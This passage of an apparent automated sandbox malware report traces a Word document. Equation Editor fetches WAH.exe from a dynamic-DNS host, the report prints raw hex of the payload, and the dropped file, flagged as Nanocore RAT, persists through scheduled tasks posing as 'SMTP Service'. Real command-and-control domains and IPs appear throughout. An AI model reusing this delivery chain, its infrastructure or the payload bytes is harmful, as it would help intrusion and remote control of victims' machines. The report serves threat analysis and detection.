            Jan 27, 2021 19:13:31.794747114 CET192.168.2.228.8.8.80x80acStandard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:49.371983051 CET192.168.2.228.8.8.80x51f2Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:13:49.431859016 CET192.168.2.228.8.8.80x51f2Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:14:06.224828959 CET192.168.2.228.8.8.80x4aa4Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:14:23.264394999 CET192.168.2.228.8.8.80x70c0Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)
            Jan 27, 2021 19:14:23.316215038 CET192.168.2.228.8.8.80x70c0Standard query (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.euA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Jan 27, 2021 19:12:26.243801117 CET8.8.8.8192.168.2.220xc62bNo error (0)manojvashanava234.sytes.net84.38.135.158A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:26.316358089 CET8.8.8.8192.168.2.220x2d4bNo error (0)manojvashanava234.sytes.net84.38.135.158A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:26.373219967 CET8.8.8.8192.168.2.220x2d4bNo error (0)manojvashanava234.sytes.net84.38.135.158A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:36.870922089 CET8.8.8.8192.168.2.220x8e4aNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:36.934432983 CET8.8.8.8192.168.2.220x8e4aNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:54.575504065 CET8.8.8.8192.168.2.220xd5c3No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:12:54.623795986 CET8.8.8.8192.168.2.220xd5c3No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:14.169197083 CET8.8.8.8192.168.2.220x62a5No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.736298084 CET8.8.8.8192.168.2.220x80acNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.793814898 CET8.8.8.8192.168.2.220x80acNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:31.852606058 CET8.8.8.8192.168.2.220x80acNo error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:49.430886030 CET8.8.8.8192.168.2.220x51f2No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:13:49.490283012 CET8.8.8.8192.168.2.220x51f2No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:14:06.283364058 CET8.8.8.8192.168.2.220x4aa4No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:14:23.315639973 CET8.8.8.8192.168.2.220x70c0No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)
            Jan 27, 2021 19:14:23.377532959 CET8.8.8.8192.168.2.220x70c0No error (0)dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu46.243.219.32A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • manojvashanava234.sytes.net

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.224916584.38.135.15880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            TimestampkBytes transferredDirectionData
            Jan 27, 2021 19:12:26.451312065 CET0OUTGET /WAH.exe HTTP/1.1
            Connection: Keep-Alive
            Host: manojvashanava234.sytes.net
            Jan 27, 2021 19:12:26.534096956 CET2INHTTP/1.1 200 OK
            Date: Wed, 27 Jan 2021 18:12:25 GMT
            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
            Last-Modified: Wed, 27 Jan 2021 18:12:25 GMT
            ETag: W/"1e1e00-5b9e73c7fac88"
            Accept-Ranges: bytes
            Content-Length: 1973760
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/x-msdownload
            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 e7 39 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 1e 00 00 02 00 00 00 00 00 00 5e 38 1e 00 00 20 00 00 00 40 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 1e 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 1e 00 00 20 00 00 00 1a 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1e 00 00 02 00 00 00 1c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 38 1e 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 52 00 00 60 e5 1d 00 03 00 00 00 94 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 95 01 00 06 39 18 00 00 00 fe 09 00 00 72 60 02 1d 70 fe 09 01 00 28 43 00 00 0a 28 44 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 45 00 00 0a 2a fe 09 00 00 2a 2a fe 09 00 00 28 5f 00 00 0a 2a 00 13 30 01 00 5f 08 00 00 00 00 00 00 28 93 01 00 06 28 92 01 00 06 28 91 01 00 06 28 90 01 00 06 28 8f 01 00 06 28 8e 01 00 06 28 8d 01 00 06 28 8c 01 00 06 28 8b 01 00 06 28 8a 01 00 06 28 89 01 00 06 fe 06 01 00 00 0a 80 87 01 00 04 28 88 01 00 06 28 87 01 00 06 28 86 01 00 06 fe 06 02 00 00 0a 80 86 01 00 04 28 85 01 00 06 28 84 01 00 06 28 83 01 00 06 fe 06 03 00 00 0a 80 85 01 00 04 28 82 01 00 06 28 81 01 00 06 28 80 01 00 06 28 7f 01 00 06 28 7e 01 00 06 28 7d 01 00 06 28 7c 01 00 06 28 7b 01 00 06 28 7a 01 00 06 28 79 01 00 06 28 78 01 00 06 28 77 01 00 06 28 76 01 00 06 28 75 01 00 06 28 74 01 00 06 28 73 01 00 06 28 72 01 00 06 28 71 01 00 06 28 70 01 00 06 28 6f 01 00 06 28 6e 01 00 06 fe 06 04 00 00 0a 80 84 01 00 04 28 6d 01 00 06 28 6c 01 00 06 28 6b 01 00 06 fe 06 05 00 00 0a 80 83 01 00 04 28 6a 01 00 06 28 69 01 00 06 28 68 01 00 06 fe 06 06 00 00 0a 80 82 01 00 04 28 67 01 00 06 28 66 01 00 06 28 65 01 00 06 fe 06 07 00 00 0a 80 81 01 00 04 28 64 01 00 06
            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL9`^8 @@ `@8K@ H.textd `.reloc@@B@8HR`* *90(9r`p(C(D*(E***(_*0_((((((((((((((((((((((~(}(|({(z(y(x(w(v(u(t(s(r(q(p(o(n(m(l(k(j(i(h(g(f(e(d
            Jan 27, 2021 19:12:26.534126043 CET3INData Raw: 28 63 01 00 06 28 62 01 00 06 fe 06 08 00 00 0a 80 80 01 00 04 28 61 01 00 06 28 60 01 00 06 28 5f 01 00 06 fe 06 08 00 00 0a 80 7f 01 00 04 28 5e 01 00 06 28 5d 01 00 06 fe 06 04 00 00 0a 80 7e 01 00 04 28 5c 01 00 06 28 5b 01 00 06 28 5a 01 00
            Data Ascii: (c(b(a(`(_(^(]~(\([(Z(Y(X(W(V(U(T(S(R(Q(P(O(N(M(L(K(J(I(H(G(F(E(D(C(B(A(@(?(>(=(<(;(:
            Jan 27, 2021 19:12:26.534138918 CET4INData Raw: 28 5e 00 00 06 fe 06 09 00 00 0a 80 0f 00 00 04 28 5d 00 00 06 28 5c 00 00 06 28 5b 00 00 06 28 5a 00 00 06 28 59 00 00 06 28 58 00 00 06 28 57 00 00 06 28 56 00 00 06 28 55 00 00 06 28 54 00 00 06 28 53 00 00 06 28 52 00 00 06 28 51 00 00 06 28
            Data Ascii: (^(](\([(Z(Y(X(W(V(U(T(S(R(Q(P(O(N(M(L(K(J(I(H(G(F(E(D(C(B(A(@(?(>(=(<(;(:(9(8(7(6(5(4(3(2(1(0
            Jan 27, 2021 19:12:26.534154892 CET6INData Raw: 9d 25 20 02 00 00 00 1f 37 9d 25 18 1f 6e 9d 25 20 01 00 00 00 1f 62 9d 25 20 01 00 00 00 1f 36 9d 25 20 01 00 00 00 1f 37 9d 25 20 01 00 00 00 1f 65 9d 25 17 1f 4a 9d 25 20 00 00 00 00 1f 39 9d 25 20 00 00 00 00 1f 64 9d 25 20 00 00 00 00 1f 61
            Data Ascii: % 7%n% b% 6% 7% e%J% 9% d% a% d%zs (rp+o& ( ( ( ( ( (o
            Jan 27, 2021 19:12:26.611943007 CET7INData Raw: 1f 35 9d 25 16 1f 41 9d 73 0d 00 00 0a 00 6f 15 00 00 0a 00 fe 0c 0b 00 7e 16 00 00 0a 6f 13 00 00 0a 00 fe 0c 0b 00 7e 17 00 00 0a 6f 13 00 00 0a 00 fe 0c 0b 00 7e 18 00 00 0a fe 0c 09 00 6f 19 00 00 0a 00 fe 0c 0b 00 7e 1a 00 00 0a fe 0c 08 00
            Data Ascii: 5%Aso~o~o~o~% 0% c%e% e% c%m% 7% 4%a% 8% 7%N% 5% 8%y% a% b%B% 9%
            Jan 27, 2021 19:12:26.611969948 CET9INData Raw: 06 00 00 00 1f 33 9d 25 1c 1f 6f 9d 25 20 05 00 00 00 1f 36 9d 25 20 05 00 00 00 1f 37 9d 25 20 05 00 00 00 1f 37 9d 25 1b 1f 50 9d 25 20 04 00 00 00 1f 39 9d 25 20 04 00 00 00 1f 36 9d 25 20 04 00 00 00 1f 32 9d 25 1a 1f 79 9d 25 20 03 00 00 00
            Data Ascii: 3%o% 6% 7% 7%P% 9% 6% 2%y% 2% a% 5%r% 1% f% 7%t% 2% c% e%n% 2% 8% f%Eso~o~o
            Jan 27, 2021 19:12:26.611987114 CET10INData Raw: 1f 64 9d 25 16 1f 43 9d 73 0d 00 00 0a 00 20 04 00 00 00 8d 0f 00 00 01 25 20 00 00 00 00 d0 01 00 00 01 28 0e 00 00 0a a2 25 20 01 00 00 00 d0 09 00 00 01 28 0e 00 00 0a a2 25 20 02 00 00 00 d0 1c 00 00 01 28 0e 00 00 0a a2 25 20 03 00 00 00 d0
            Data Ascii: d%Cs % (% (% (% (oo~ o % ~)& ( ( ( (* * ** *
            Jan 27, 2021 19:12:26.612005949 CET11INData Raw: 09 03 00 a2 28 43 00 00 0a 2a fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 28 48 00 00 0a 2a 00 00 00 1b 30 04 00 e4 00 00 00 05 00 00 11 fe 09 00 00 fe 0d 00 00 28 a6 01 00 06 fe 0e 01 00 fe 0c 01 00 3a 0a 00 00 00 14 fe 0e 05 00 dd bb 00 00
            Data Ascii: (C*(H*0(:sI o!9oJ:(oK&8rpoK&(oK&9(oK&
            Jan 27, 2021 19:12:26.612018108 CET13INData Raw: 33 00 00 0a 26 2a 00 00 00 13 30 05 00 78 00 00 00 0a 00 00 11 73 49 00 00 0a fe 0e 00 00 fe 09 00 00 fe 09 01 00 fe 0d 01 00 fe 0d 02 00 fe 0d 03 00 28 9f 01 00 06 fe 0c 01 00 28 53 00 00 0a 3a 3e 00 00 00 fe 0c 00 00 72 d6 03 1d 70 6f 4b 00 00
            Data Ascii: 3&*0xsI((S:>rpoKoK& ?rpoKoT&oL*0sI 8% XoUoQ&oV; Yo
            Jan 27, 2021 19:12:26.612051010 CET14INData Raw: fe 0d 10 00 6f 38 00 00 0a 39 06 00 00 00 72 78 06 1d 70 2a fe 0c 0f 00 fe 0c 10 00 fe 09 03 00 28 a4 01 00 06 2a 72 b2 06 1d 70 2a 00 00 00 13 30 02 00 bb 01 00 00 00 00 00 00 fe 09 02 00 20 01 00 00 00 52 fe 09 00 00 45 20 00 00 00 05 00 00 00
            Data Ascii: o89rxp*(*rp*0 RE ""q""""""""""""8rp*rp*r<p*rRp*
            Jan 27, 2021 19:12:26.612117052 CET15INData Raw: 50 fe 0e 00 00 38 00 00 00 00 dd b5 00 00 00 fe 0c 02 00 20 01 00 00 00 58 20 00 00 00 00 fe 0e 02 00 45 07 00 00 00 00 00 00 00 ec fe ff ff 00 ff ff ff 2a ff ff ff 8c ff ff ff b0 ff ff ff c7 ff ff ff dd 6c 00 00 00 fe 0c 03 00 fe 0e 02 00 fe 0c
            Data Ascii: P8 X E*l = 8E6u _ _t~) 3~)z9~)*APs


            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: WINWORD.EXE PID: 2284 Parent PID: 584

            General

            Start time:19:12:38
            Start date:27/01/2021
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Imagebase:0x13fdc0000
            File size:1424032 bytes
            MD5 hash:95C38D04597050285A18F66039EDB456
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: EQNEDT32.EXE PID: 2424 Parent PID: 584

            General

            Start time:19:12:39
            Start date:27/01/2021
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Imagebase:0x400000
            File size:543304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: JNM.exe PID: 1692 Parent PID: 2424

            General

            Start time:19:12:42
            Start date:27/01/2021
            Path:C:\Users\user\AppData\Roaming\JNM.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\JNM.exe
            Imagebase:0xce0000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 35%, ReversingLabs
            Reputation:low

            Chronological Activities

            Analysis Process: cmd.exe PID: 1780 Parent PID: 1692

            General

            Start time:19:12:44
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
            Imagebase:0x4abd0000
            File size:302592 bytes
            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: timeout.exe PID: 2336 Parent PID: 1780

            General

            Start time:19:12:45
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\timeout.exe
            Wow64 process (32bit):true
            Commandline:timeout 1
            Imagebase:0xa20000
            File size:27136 bytes
            MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Chronological Activities

            Analysis Process: JNM.exe PID: 2304 Parent PID: 1692

            General

            Start time:19:12:46
            Start date:27/01/2021
            Path:C:\Users\user\AppData\Roaming\JNM.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\JNM.exe
            Imagebase:0xce0000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, Author: Joe Security
            Reputation:low

            Chronological Activities

            Analysis Process: schtasks.exe PID: 2808 Parent PID: 2304

            General

            Start time:19:12:48
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
            Imagebase:0xca0000
            File size:179712 bytes
            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: schtasks.exe PID: 2476 Parent PID: 2304

            General

            Start time:19:12:49
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
            Imagebase:0xb40000
            File size:179712 bytes
            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: taskeng.exe PID: 2464 Parent PID: 860

            General

            Start time:19:12:49
            Start date:27/01/2021
            Path:C:\Windows\System32\taskeng.exe
            Wow64 process (32bit):false
            Commandline:taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
            Imagebase:0xff1a0000
            File size:464384 bytes
            MD5 hash:65EA57712340C09B1B0C427B4848AE05
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Chronological Activities

            Analysis Process: JNM.exe PID: 2360 Parent PID: 2464

            General

            Start time:19:12:50
            Start date:27/01/2021
            Path:C:\Users\user\AppData\Roaming\JNM.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\JNM.exe 0
            Imagebase:0xce0000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Analysis Process: smtpsvc.exe PID: 3012 Parent PID: 2464

            General

            Start time:19:12:51
            Start date:27/01/2021
            Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            Wow64 process (32bit):true
            Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
            Imagebase:0x150000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 35%, ReversingLabs
            Reputation:low

            Chronological Activities

            Analysis Process: cmd.exe PID: 1360 Parent PID: 2360

            General

            Start time:19:12:56
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
            Imagebase:0x4a8f0000
            File size:302592 bytes
            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: timeout.exe PID: 1480 Parent PID: 1360

            General

            Start time:19:12:57
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\timeout.exe
            Wow64 process (32bit):true
            Commandline:timeout 1
            Imagebase:0xc10000
            File size:27136 bytes
            MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Chronological Activities

            Analysis Process: cmd.exe PID: 1836 Parent PID: 3012

            General

            Start time:19:12:58
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
            Imagebase:0x4a8f0000
            File size:302592 bytes
            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: timeout.exe PID: 1336 Parent PID: 1836

            General

            Start time:19:12:59
            Start date:27/01/2021
            Path:C:\Windows\SysWOW64\timeout.exe
            Wow64 process (32bit):true
            Commandline:timeout 1
            Imagebase:0x7f0000
            File size:27136 bytes
            MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Chronological Activities

            Analysis Process: JNM.exe PID: 2220 Parent PID: 2360

            General

            Start time:19:12:59
            Start date:27/01/2021
            Path:C:\Users\user\AppData\Roaming\JNM.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\JNM.exe
            Imagebase:0xce0000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Analysis Process: EQNEDT32.EXE PID: 2176 Parent PID: 584

            General

            Start time:19:13:00
            Start date:27/01/2021
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Imagebase:0x400000
            File size:543304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: smtpsvc.exe PID: 1976 Parent PID: 3012

            General

            Start time:19:13:01
            Start date:27/01/2021
            Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            Wow64 process (32bit):true
            Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            Imagebase:0x150000
            File size:1973760 bytes
            MD5 hash:10D30AD1922421E73E133AD020DF424F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, Author: Joe Security
